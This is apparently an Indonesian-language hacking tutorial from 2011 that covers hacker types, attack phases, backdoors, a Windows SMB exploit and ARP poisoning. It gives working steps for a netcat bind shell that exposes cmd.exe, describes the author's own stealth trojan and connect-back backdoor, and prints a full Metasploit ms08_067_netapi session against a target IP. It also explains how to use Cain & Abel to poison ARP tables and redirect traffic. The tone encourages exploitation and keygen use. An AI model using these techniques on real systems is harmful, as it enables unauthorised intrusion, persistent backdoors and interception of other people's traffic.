0% menganggap dokumen ini bermanfaat (0 suara)
328 tayangan

NetWork Hacking

Dokumen tersebut membahas tentang pengertian hacking secara umum dan jenis-jenis hacker beserta kemampuan mereka. Secara ringkas, dokumen tersebut menjelaskan bahwa hacking pada dasarnya adalah mengutak-atik komputer untuk memahami sistem secara mendalam, namun media sering menghubungkannya dengan kejahatan. Dokumen tersebut kemudian membedakan tiga jenis hacker yaitu whitehat, blackhat, dan greyhat

Diunggah oleh

Scoundrel Byte
Hak Cipta
© Attribution Non-Commercial (BY-NC)
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai DOC, PDF, TXT atau baca online di Scribd
0% menganggap dokumen ini bermanfaat (0 suara)
328 tayangan

NetWork Hacking

Dokumen tersebut membahas tentang pengertian hacking secara umum dan jenis-jenis hacker beserta kemampuan mereka. Secara ringkas, dokumen tersebut menjelaskan bahwa hacking pada dasarnya adalah mengutak-atik komputer untuk memahami sistem secara mendalam, namun media sering menghubungkannya dengan kejahatan. Dokumen tersebut kemudian membedakan tiga jenis hacker yaitu whitehat, blackhat, dan greyhat

Diunggah oleh

Scoundrel Byte
Hak Cipta
© Attribution Non-Commercial (BY-NC)
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai DOC, PDF, TXT atau baca online di Scribd
Anda di halaman 1/ 35

NetWork Hacking

Hacking Secara umum

Pengertian hacking secara umum telah banyak di


jelaskan di internet maupun oleh saya sendiri pada
beberapa pertemuan  . Hacking merupakan
tindakan meng oprek komputer , baik secara
hardware maupun secara software . Jadi orang yang
suka mengutak- atik komputer baik software maupun
hardware (over Clock) bisa di bilang adalah seorang
hacker. Tetapi kemudian media ,baik cetak maupun
elektronik, selalu mengaitkan hacker dengan
tindakan kejahatan. Seperti pencurian kartu kredit,
pencurian akun maupun tindakan destruktif
semacam deface website. Namun pada dasarnya,
seorang hacker adalah orang yang berusaha
memahami sebuah system secara mendalam.

Untuk pertemuan kali ini saya akan membedakan


antara webhacking dan network hacking, meskipun
kemudian perbedaan keduanya menjadi semakin
tipis dengan banyaknya perkembangan di dunia
digital.

Hacker dan hacking identik dengan pengrusakan


web atau data dalam komputer target. Namun pada
kenyataanya hacking sendiri mempunyai cakupan
yang lebih luas daripada itu. Hacking
menggabungkan pengetahuan programming dan
networking untuk mencapai tujuan
Hacker sendiri menurut pandangan public dan media
adalah orang/individu yang mempunyai kemampuan
sedemikian sehingga dapat menembus system
pertahanan sebuah system dan menguasai system
tersebut untuk di gunakan sebagai kesenangan
ataupun untuk keuntungan si hacker.

Namun pada kenyataanya dengan kemampuan


hacker yang sedemikian, hacker mampu
menemukan lubang/hole/bug pada sebuah system
operasi maupun aplikasi di dalamnya, sehingga
hacker tersebut juga mampu menutup kelemahan ini
agar system tersebut dapat menjadi lebih aman. Jadi
apakah hacker itu ibliz??ataukah malaikat?? Terlepas
dari definisi hacker , yang pasti hacker mempunyai
kemampuan teknis jaringan, programming dan
system operasi dan mampu memadukannya untuk
mencapai tujuan hacker tersebut.

Menurut beberapa ahli IT hacker di bagi menjadi 3


bagian besar yaitu:

 Hacker Whitehat (topi putih/real hacker)


Hacker ini merupakan hacker yang baik, dimana
jika dia menemukan suatu
kelemahan/lubang/bug pada sebuah system
maupun aplikasi dengan segera hacker ini
segera memberi kabar kepada pemilik system
atau pembuat aplikasi yang bersangkutan dan
dengan kemampuannya, hacker tersebut
mencoba memperbaiki lubang yang di
temukannya. Developer/ pembuat aplikasi yang
banyak dipakai oleh public juga di golongkan
sebagai whitehat. Salah satu contoh orang yang di
akui dunia sebagai whitehat hacker adalah Linus
torvalds pencipta system operasi Linux.

 Hacker Blackhat(topi hitam/cracker/hacker


jahat)
Hacker type ini merupakan hacker vandals atau
dalam arti hacker ini mencoba masuk ke
sebuah system secara illegal. Dimana jika hacker
ini menemukan sebuah kelemahan/bug maka
dengan segera hacker tersebut
memanfaatkannya untuk kepentingan dirinya
baik untuk di gunakan untuk kejahatan
maupun untuk kepentingan lainnnya.

 Hacker greyhat(topi abu-abu)

Hacker type ini merupakan orang yang mencoba


memberitahukan kelemahan yang di temukkannya
pada pemilik system ataupun developer software
yang terkena bug, namun selain itu hacker type ini
juga memanfaatkan kelemahan ini untuk
keuntungan dirinya sendiri.

Saya sendiri tidak pernah membeda-bedakan hacker-


hacker ini, karna pada kenyataannya hacker-hacker
ini baik yang di anggap jahat maupun baik,
semuanya mampu memberikan sumbangan bagi
perkembangan di dunia IT. Melalui tool-tool maupun
software-software buatan mereka, dan menurut saya
sendiri hacker sejati itu bukan di nilai dari
tindakannya tetapi lebih kepada kemampuannya
seperti kemampuan programming, networking
maupun pengetahuannya tentang system operasi.
Dan hacker yang hanya bisa memakai tool dan
banyak omong itulah yang saya sebut “hacker-
hacker an”

Beberapa kemampuan yang mampu di lakukan oleh


orang-orang seperti ini antara lain:

Hacker
Hacker secara umum yang mempunyai
pengetahuan mendasar tentang sebuah system
operasi, networking dan programming secara umum.
Kemampuan ini dapat di manfaatkannya untuk
menemukan kelemahan di dalam sebuah system
komputer baik kelemahan di aplikasi(web maupun
desktop) atau di dalam system operasi nya itu
sendiri, dan dengan kelemahan yang di
temukannya , hacker dapat memanfaatkannya untuk
menembus system pertahanan sebuah system
komputer.

 Reverser
Orang yang bekerja mencari kelemahan
algoritma di dalam software-software komersial
untuk kemudian membuat software “versi dirinya”
agar software itu bisa di gunakan secara gratis.
Kemampuan dasar reverser adalah programming
bahasa tingkat rendah semacam C dan ASM
sehingga memungkinkan dirinya memahami
algoritma “Product key” di dalam sebuah software
komersial, setelah dapat memahami algoritma
“Product key” maka dengan kemampuannya
reverser mampu membuat sebuah KeyGen,
dimana KeyGen ini sering kita pake (sebagai
pengguna aktif windows, tentu saja  agar kita
tidak perlu membayar sebuah aplikasi komersial 
. KeyGen adalah produk para reverser dengan
kemampuan yang menakjubkan 

 Phreaker
Phreaker adalah orang yang mencari kelemahan
di dalam system telekomunikasi baik device/alat
telekomunikasi ataupun system perusahaan
telekomunikasi itu sendiri(TELKOM??) dimana
dengan kemampuannya ini, phreaker berusaha
memakai layanan telekomunikasi secara gratis .
Jika anda tahu bluebox, maka bluebox adalah
salah satu produk para phreaker ini.

 VXer(virus maker)
VXer atau VirusMaker adalah orang yang
mempunyai kemampuan mendasar tentang
system operasi dan pemrogramman, dimana ilmu-
ilmu ini di manfaatkannya untuk membuat sebuah
program komputer yang dapat mengubah jalannya
suatu system ataupun merusakannya. Salah satu
contoh virus yang terkenal adalah
brontok,Sasser,Beagle,Sality, Alman. Selain virus
juga banyak type malware lain yang mampu di
buat oleh VXer ini seperti
worm,Trojan,spyware,botnet dll.
 Carder
Carder adalah orang yang mempunyai
kemampuan untuk mengambil data kartu kredit
orang secvara illegal dan menggunakannya untuk
kepentingan pribadinya, seperti
membelanjakannya untuk membeli software
ataupun barang-barang kesukaannya.

Webhacking pernah saya bahas pada seminar


sebelumnya, jadi kali ini saya akan membahas
network hacking , tetapi tentu saja step-step nya
masih sama dengan web hacking 

2.Fasa-fasa hacking

Sebelum hacker mampu menembus dan


menguasai suatu system maka hacker tersebut perlu
mengenali system target terlebih dahulu, artinya ada
tahapan-tahapan khusus yang di lakukan oleh hacker
sebelum melakukan hacking ke dalam system target.

Menurut saya berikut adalah tahapan-tahapan


hacking yang di lakukan sebelum hacker menguasai
sebuah target:

1. Reconnaissance (footprinting)
2. Vulnerability Exploitation and Access.
3. Privilege Escalation & owning the box.
4. Erase tracks.
5. Maintaining access.
6. DDOS
Tentu saja tahapan-tahapan ini tidak harus kita
ikuti,karna hacking sendiri adalah sebuah seni.
Kapan kita memulai apa dalam tahap-tahap itu,bisa
kita lakukan untuk mendapatkan akses ke system
target 

Reconnaissance (footprinting).

FootPrinting merupakan tahap dimana hacker


mencoba mengumpulkan informasi sebanyak
mungkin.Port target, service yang di jalankan oleh
target,
OS target, nama pemilik system , IP target, DNS zone
transfer, whois, search engine, juga di perlukan
dalam tahap ini.Dalam tahap ini juga ada beberap
teknik menarik yang “NON teknis” semacam:

- Dumpster diving:
Mengorek sampah guna mencari data-data yang
berguna untuk masuk ke system target
- Social Engineering
Menipu user sah system agar di peroleh
iinformasi sebanyak mungkin
- Shoulder sniffing
Mengintip password dari user yang sah

Dalam teknik Reconaisance ini hacker bisa


menggunakan tool scanner yang sangat terkenal
yaitu nmap, dimana dengan nmap kita bia
mengetahui port-port yang terbuka pada system
target. Beberapa service yang berjalan pada system ,
default nya memakai port-port:

Port | Service
---------------------------------------------------------------------
21 FTP (File transfer protocol)
22 SSH(Secure Shell)
23 Telnet
80 Webserver
3306 MySQL

Contoh penggunaan nmap untuk men-scan system


target

Ini adalah contoh penggunaan Nmap untuk


mengetahui OS dari sebuah system:

Dan ini adalah sebuah contoh penggunaan nmap


untuk mencari system yang membuka port
tertentu :
Vulnerability Exploitation And access

Dalam tahap ini hacker mencoba meng-exploitasi


terhadap bug yang kemungkinan di miliki oleh
service target. Dan jika pada salah satu teknik
exploitation ini si hacker berhasil menembus
pertahanan system target, maka dengan segera
hacker telah mendapatkan akses ke dalam system
target.Bug pada web yangs erring di exploitasi oleh
hacker adalah SQL injection,RFI,LFI dll. Sedangkan
pada service lain selain webserver(port 80) maka
hacker terkadang memakai exploit service, semacam
service SMB(sharing) pada windows yang banyak
bug di dalamnya.

Privilege Escalation & owning the box

Tahap dimana hacker mencari dan mendapatakan


password Admin/root dan menguasai system lebih
luas.Dimana dengan penguasaan yang lebih tinggi
inilah hacker mulai mampu melihat semua data di
dalam server target. Dengan hak akses tertinggi
inilah hacker sudah bisa mengendalikan server
target sepenuhnya.

Erase tracks
Setelah akses root/admin terkuasai ,maka hacker
perlu menghapus jejak yang mungkin mengarah
pada dirinya,atau memungkinkan admin mengtahui
jejak hacker dalam systemnya

Maintaining access

Penanaman backdoor dimana ini merupakan pintu


masuk bagi hacker, jika suatu saat akun root/admin
yang di kuasai hacker sudah di ketahui. Dan
backdoor ini juga di gunakan untuk masuk hacker
sehingga hacker tidak perlu meng-explotasi system
lagi.

DOS/DDOS(Distributed/Denial Of Service)

Tindakan ini di lakukan oleh hacker vandals jika


semua cara masuk ke dalam system sudah tidak
memungkinkan.Dengan serangan DDOS ini,admin
atau pemilik system dengan terpaksa mematikan
system mereka . Serangan DOS lebih
memanfaatkan kelemahan pada system target,
contoh nyata dalam hal ini adlah bug pada
WINDOWS XP Profesional, dimana dengan
mengirimkan paket yang besar dapat menyebabkan
system WINDOWS ini menjadi crash. Sedangkan
untuk serangan DDOS, hacker sebelumnya sudah
mempunyai beberapa system yang telah di hack,
dan system-system ini telah di pasangi Botnet yang
mudah di kendalikan, Botnet ini sendiri biasanya
hanya sebuah program kecil yang akan menunggu
perintah dari si hacker untuk melakukan serangan
Flooding ke system target lainnya.

NetWork Hacking

Untuk network hacking kali ini, saya akan


memberikan beberapa materi yang saya bedakan
dengan webhacking, meskipun dalam perkembangan
teknologi informasi, maka network hacking dan
webhacking hamper tidak jauh berbeda, contohnya
adalah banyaknya personal yang menginstall
software webserver sendiri di komputer ataupun di
laptop pribadinya, yang kemudian memungkinkan
seorang attacker menyerang komputer target via
LAN dengan memanfaatkan bug web pada service
webserver tersebut.

Network Hacking bisa menjadi masalah serius saat


yang di serang adalah jaringan sebuah institusi
penting. Seorang hacker mampu melakukan
serangan pada network yang lemah dengan
memanfaatkan beberapa kelemahan berikut:
- Kelemahan pada webserver yang berjalan
pada jaringan (webhacking/ gak akan saya
bahas sekarang)
- Kelemahan OS pada jaringan (terutama sekali
kelemahan yang bisa di akses secara remote,
misalnya bug pada service DCOM milik
windows yang di manfaatkan oleh hacker )
- Kelemahan pada sisi protokol jaringan (akan
kita bahas ) dengan potensi serangan DOS,
MITM (Man In The Middle) Attack dll.
- Kelemahan pada sisi user (weak password,
Social Engineering dan lain- lain)
- Dan lain-lain

Kali ini akan saya bahas beberapa teknik yang saya


jelaskan di atas. Enjoy the show! 

What is Port , Bind Port??, Reverse Connect??

Di dunia hacking n cracking, ada banyak istilah


aneh ..
Yaitu yang akan saya jelaskan sekarang adalah Port,
bind dan reverse bind. Baik bind maupun reverse,
keduanya adalah teknik yang umum di gunakan oleh
hacker dalam backdooring (pintu belakang)

~PORT

Port yang saya utarakan di sini adalah port virtual


dan bukan port fisik seperti port USB, ataupun port
printer(LPT), port virtual ini adalah port yang
terdapat di dalam system operasi dan program-
program komputer yang memungkinkan penggunaan
2 komputer dapat saling bertukar data,Port itu ibarat
pintu yang bisa di buka agar data dapat lewat

sedemikian sehingga pertukaran data anatara 2


system komputer dapat terjadi. Contoh port – port
yang umum di gunakan adalah port 80, yang di
gunakan oleh webserver semcam apache (XAMPP),
IIS sehingga server tersebut bisa melayani client
yang membuka koneksi melalui browser nya. Nah
dengan adanya webserver maka data-data amsuk ke
server melalui port 80 untuk kemudian melalui port
80 ini pula webserver memberikan jawaban atau
hasil berupa halaman web kepada client yang
mengaksesnya.
Dengan adanya port yang terbuka pada sebuah
system , maka memungkinkan 2 komputer atau
device dapat saling bertukar data.

~ BIND PORT
Bind port merupakan kata yang khas di gunakan
dalam dunia cracking/hacking,Bind secara bahasa
bisa di artikan “mengikat” dimana maksud dari
bind port ini adalah pengikatan system pada port
tertentu, biasanya system yang terbuka port nya ini
adalah system yang telah di kuasai. Bind port
artinya kita akan memaksa membuka port
tertentu pada system target(entah bagaimana
caranya, baik melalui social engineering, maupun
teknik lainnya), nt anda akan mengerti bedanya
dengan REVERSE. Contoh penggunaan bind port
adalah Trojan, dimana jika sebuah program Trojan di
jalankan di sebuah system, maka Trojan ini akan
membuka port yang telah di tentukan oleh hacker
pembuat Trojan ini. Nah, melalui port yang terbuka
oleh Trojan ini maka hacker bisa dengan mudah
menguasai system target. Untuk praktek kali ini kita
akan menggunakan NetCat dan Trojan buatan vires ,
NetCat sendiri adalah salah satu tool hacker yang
wajib di miliki dan di kuasai . Netcat di sebut
sebagai salah satu tool andalan para hacker dalam
hal backdooring, karna kemudahan dan fitur-fiturnya
yang sangat efektif dalam backdooring ini.
Oke kita mulai saja teknik backdooring dengan teknik
BIND

Silahkan buka cmd dan pindah ke direktori dimana


netcat anda tersimpan, contohnya dan jalankan
netcat nya dalam modus Listen, dimana mode ini
artinya, kita akan membuka port(listen) dan
menunggu adanya koneksi dari client lain. Di
sini kita menambahkan –e cmd.exe, dimana maksud
dari opsi ini adalah execute cmd.exe, dan semua
proses cmd.exe akan di alihkan melalui port 13337 ,
yang artinya jika ada yang meng koneksi kan ke
netcat yang listen ini, maka client tersebut akan
mendapatkan command shell dari system

Nah dari netcat lain, kita bisa connect melalui port


13337 dan hasilnya sebagai berikut:
Terlihat bahwa netcat sudah saling terkoneksi dan
lihat pula directory pada netcat yang berubah, karna
directory yang di tampilkan adalah directory dimana
netcat yang listen dijalankan. , dengan begini
attacker sudah bisa menguasai cmd pada system
target. Testing selanjutnya, kita akan menggunakan
Trojan buatan saya sendiri, yang lebih stealth (tanpa
window), sehingga akan lebih menguntungkan
attacker dalam menyembunyikan trojannya .

Di dalam paket program ada 2 file, satu file


server(backdoor) dan satu file controllernya atau
bagian client nya, yang di pegang oleh hacker, jika
bagian servernya di jalankan di system target, maka
hacker bisa menggunakan program clientnnya, untuk
mengendalikan system target , seperti berikut:
Jika setelah anda menjalankan program client nya,
anda mendapatkan pesan
“vires-vitri Greetings………..”, maka anda telah
berhasil menguasai system tersebut 

Di atas sudah di jelaskan bagaimana BIND itu,


dimana BIND itu bisa di gambarkan dengan seorang
pencuri yang sengaja membuka pintu rumah orang
dengan tujuan, pada malam hari nya pencuri
tersebut bisa masuk dari pintu itu dan mulai
mencuri, nah konsepnya sama, attacker dengan cara
menipu target, dimana dengan tipuan ini bermaksud
agar target menjalankan program Trojan, dan Trojan
inilah yang akan membuka port , sehingga bisa di
kendalikan oleh attacker .

Kelemahan teknik BIND/LISTEN adalah, bahwa jika


system target terpasang firewall, maka firewall ini
tidak akan mengijinkan adanya aplikasi yang
membuka port yang mencurigakan, sehingga
terkadang ada beberapa system yang tidak bisa di
pasangi Trojan karna adanya firewall ini  , nah
untuk mengatasi ini, hacker punya jalan lain yaitu
REVERSE CONNECT

~ REVERSE CONNECT

Nah, kalo tadi reverse connect di gambarkan sebagai


orang yang berpura-pura bertamu ke rumah korban
dan membuka pintu belakang rumah korban, maka
reverse connect akan berbeda konsep, dimana
reverse connect bisa di gambarkan sebagai seorang
pencuri yang pandai menghipnotis korbannya,
sedemikian sehingga korbannya ini akan mudah di
kendalikan oleh pencuri agar si korban mencuri
barangnya sendiri dan memberikannya kepada
pencuri itu . Kalo bingung dengan penjelasan saya,
mari
kita

praktekkan dengan netcat 

Nah, berbeda dengan Trojan(bind/listen) yang


membuka port di sisi target, maka sekarang yang
akan membuka port adalah si attacker , dengan
perintah pada netcatnya:

Nah, pada sisi target, maka perintah netcatnya akan


seperti berikut
Nah, dengan begini server target bisa di kuasai
tanpa ada halangan dari firewall, karna pada sisi
target port tidak pernah terbuka . Nah sekarang
kita testing juga connectback (reverse) buatan vires
, Yang seperti biasa, tersedia 2 file, Dimana file
cbServer adalah bagian yang di jalankan oleh
attacker, dengan cbserver ini maka, attacker akan
membuka port pada system nya, dan menunggu
adanya koneksi dari system target 

dan bagian cbClient , adalah file yang di jalankan di


system target, dan jika cbClient di jalankan maka di
sisi hacker tampilannya akan berubah menjadi
Artinya, sudah ada koneksi dari target, dan hacker
siap mengendalikan system target . Karna
connectback berbeda dengan Trojan yang membuka
port maka connectback hamper lebih susah di
deteksi oleh firewall, karna tidak membuka port
manapun , namun agar program backdoor yang di
tanam di system target bisa melakukan koneksi ke
system nya hacker, maka backdoor tersebut harus
tau IP dari attacker, nah untuk setting ini terletak
pada file “vires.neth” yang letaknya 1 direktori
dengan cbclient 
Dimana isi dari vires.neth ini adalah ipnya hacker
yang sudah menunggu koneksi dari backdoor
connectback ini 

Untuk bahasan selanjutnya kita akan membahas


bagaimana seorang cracker meng exploitasi
kelemahan pada OS untuk mendapatkan akses ke
dalam system tersebut 

Network Hacking dengan memanfaatkan Bug


pada OS

Akan saya tekankan terlebih dahulu bahwa SEMUA


OS MEMPUNYAI BUG, bedanya adalah bagaimana
eksploitasi nya, antara OS windows dan OS berbasis
UNIX, maka OS windows lebih banyak bug yang bisa
di manfaatkan oleh hacker, contoh nyata nya adalah
worm stuxnet yang memanfaatkan bug pada OS
windows, yang memungkinkan worm ter eksekusi
secara otomatis tanpa campur tangan user. Untuk
kali ini saya akan bahas bug yang bisa di akses
secara remote, yaitu bug SMB NETAPI yang terdapat
pada OS Windows XP dari SP1 sampai SP3 Dimana
dengan bug ini, hacker bisa mengakses command
shell pada komputer windows tersebut dan
menguasai nya. Untuk praktek kali ini saya akan
menggunakan kumpulan exploit , yaitu framework
METASPLOIT
Silahkan di buka metasploitnya, begini tampilan
metasploit di laptop saya:

Oke, untuk kali ini saya akan menggunakan bug


NETAPI, kalo msf sudah ready(lihat gambar di atas),
silahkan lakukan nmap tetapi kita akan mencari
system yang membuka port 445, dimana port inilah
yang di gunakan oleh NETAPI oleh windows, pada
beberapa versi windows dan kalau belum di patch
maka melalui port 445 dan bug NETAPI, kita bisa
masuk ke dalam system tersebut.
Jika sudah menemukan IP yang aktif dengan port 445
maka silahkan ketikkan perintah ini:
(tulisan yang di awali ++ adalah catetan dari vires,
jangan ikut di ketik  )

Use windows/smb/ms08_067_netapi
++ gunakan exploit bug netapi
Set payload windows/shell/bind_tcp
++ set payload yang akan di pakai, yaitu bind TCP
Show options
++ melihat parameter yang perlu di masukkan

Set rhost 192.168.9.12


++ tentukan ip target
Set lport 13337
++ tentukan port yang akan di gunakan untuk bind
exploit
Exploit
++ do it NOW brothers n sisters … 
Untuk gambarannya, lihat gambar di bawah ini:

Jika anda melihat pesan


“Command Shell session …..opened ….”
Maka anda sudah mendapatkan akses ke system
tersebut, dan coba tebak, anda sudah bisa melihat
lihat data dan semua perintah system bisa anda
pakai . Happy Exploiting!!
Perintah komplitnya jadi seperti ini:

msf > use windows/smb/ms08_067_netapi


msf exploit(ms08_067_netapi) > set payload
windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required


Description
---- --------------- -------- -----------
RHOST yes The target
address
RPORT 445 yes Set the SMB
service port
SMBPIPE BROWSER yes The pipe
name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):

Name Current Setting Required


Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit
technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST no The target
address
Exploit target:

Id Name
-- ----
0 Automatic Targeting

msf exploit(ms08_067_netapi) > set rhost


192.168.9.12
rhost => 192.168.9.12
msf exploit(ms08_067_netapi) > set lport
13337
lport => 13337
msf exploit(ms08_067_netapi) > exploit

Saya akan memberikan contoh lain BUG pada OS


windows, dan masih merupakan bug baru (bug yang
di manfaatkan oleh stuxnet ), saya bahkan sudah
membuat worm dengan memanfaatkan bug ini,
namun tidak pernah saya publish (high
responsibility), namun akan saya berikan
gambarannya nanti. Dengan kemampuan
programming dan networking anda, saya yakin anda
punya kesempatan untuk membuat hal yang serupa
dengan yang saya buat  . Sekali saya tegaskan
bahwa hacking itu seni yang menggabungkan
kemampuan programming dan networking .

Network Hacking dengan memanfaatkan


Kelemahan pada sisi protokol jaringan
Untuk kali ini saya akan menjelaskan bagaimana
protocol jaringan bekerja dan dengan mengetahui
pengetahuan ini, maka kita bisa mengetahui
bagaimana hacker bisa memanfaatkannya 

~ARP(Address Resolution Protocol)

ARP merupakan protocol jaringan yang


memungkinkan pengubahan dari IP ADDRESS
menjadi MAC ADDRESS, lalu apa gunanya??
Baik, sebagai pengetahuan anda saya akan
memberikan gambaran seperti ini:
Jadi, ketika 2 device/komputer akan saling bertukar
data di jaringan, maka yang perlu di lakukan oleh
komputer pertama (komputer A) yang akan
berkomunikasi adalah mengetahui MAC ADDRESS
dari komputer lain(komputer B) yang akan di ajak
bertukar data, Nah, karna pada dasarnya komputer
hanya mengetahui IP ADDRESS dari komputer yang
akan di hubunginya (dalam hal ini komputer B),
maka komputer A akan mengirimkan ARP REQUEST
ke dalam jaringan. Untuk ARP REQUEST sendiri ,
mempunyai sifat broadcast, atau menyebar di
jaringan, yaitu dengan begini, semua komputer yang
ada di jaringan akan menerima paket ARP REQUEST
ini. Nah, ARP REQUEST ini bisa di gambarkan sebagai
analogi orang yang berteriak di dalam kelas “Hey,
IP 192.168.0.2, berapa MAC kamu??saya mau
tukar data, ini MAC saya 11:22:33:44:55:66 dan
Ip saya 192.168.0.3” karna bersifat broadcast,
maka semua komputer menerima paket ini, dan
karna komputer B mempunyai MAC yang cocok
dengan yang ditanyakan, maka komputer B akan
membalas ke MAC 11:22:33:44:55:66 dengan ARP
REPLY , dimana sifat ARP REPLY kebalikan dari
broadcast, yaitu UNICAST, artinya, ARP REPLY ini
khusus di tujukan kepada MAC ADDRESS komputer
A. yang analoginya adalah seperti ini:

“HEY MAC 11:22:33:44:55:66, saya 192.168.0.2 dan


MAC saya adalah 22:33:44:55:66:77”

Nah, karna komputer A sudah menerima ARP REPLY,


maka komputer A akan meng update ARP CACHE di
dalam systemnya, dimana ARP CACHE ini akan berisi
daftar

Ip.address Mac Address

Jadi di dalam arp cache komputer A, akan menjadi


seperti ini:

192.168.0.2 22:33:44:55:66:77

Sedangkan arp cache di komputer B akan menjadi


seperti ini:

192.168.0.3 11:22:33:44:55:66

Karna komputer A dan komputer B, sudah saling


mengetahui Ip dan MAC ADDRESS masing-masing,
maka mereka bisa mulai bertukar data (mungkin
hanya sebuah PING) 

~ The Trouble maker!

Anda sekarang mengetahui bagaimana ARP bekerja,


celakanya, ARP ini bisa di manipulasi oleh hacker
untuk tujuan-tujuan jahat , dimana dengan
memanipulasi ARP REPLY maka hacker bisa
melakukan pengalihan traffic jaringan dan juga aksi
DOS (Denial Of Service)

~ Pengalihan Traffic jaringan


Untuk pengalihan traffic jaringan ini, maka kita perlu
memakai tool yang bernama cainabel

Cara kerja cainabel dalam mengalihkan traffic


jaringan adalah sebagai berikut:

Hacker dengan tool cainabel mengirimkan packet


ARP REPLY ke komputer A dengan data “IP gateway
dan MAC ADDRESS 33:44:55:66:77:88(mac hacker)”
dan mengirimkan ARP REPLY ke gateway dengan
data “IP komp A dan MAC ADDRESS
33:44:55:66:77:88”

Dengan begini,komp A menganggap mac


33:44:55:66:77:88 adalah mac address gateway dan
gateway menganggap mac 33:44:55:66:77:88 adlah
mac komputer A, kalo sudah begini, semua traffic
dari A ke gateway telah teralihkan ke komputer
hacker 

~penggunaan CainAbel

1. mengaktifkan program sniffer

2. mengetahui ip2 yang ada di jaringan


3. mengaktifkan menu APR
4. Memilih ip yang akan di poison
POISONED!!!
Program lain: NetCut:

Selesai, vires, 2011

Anda mungkin juga menyukai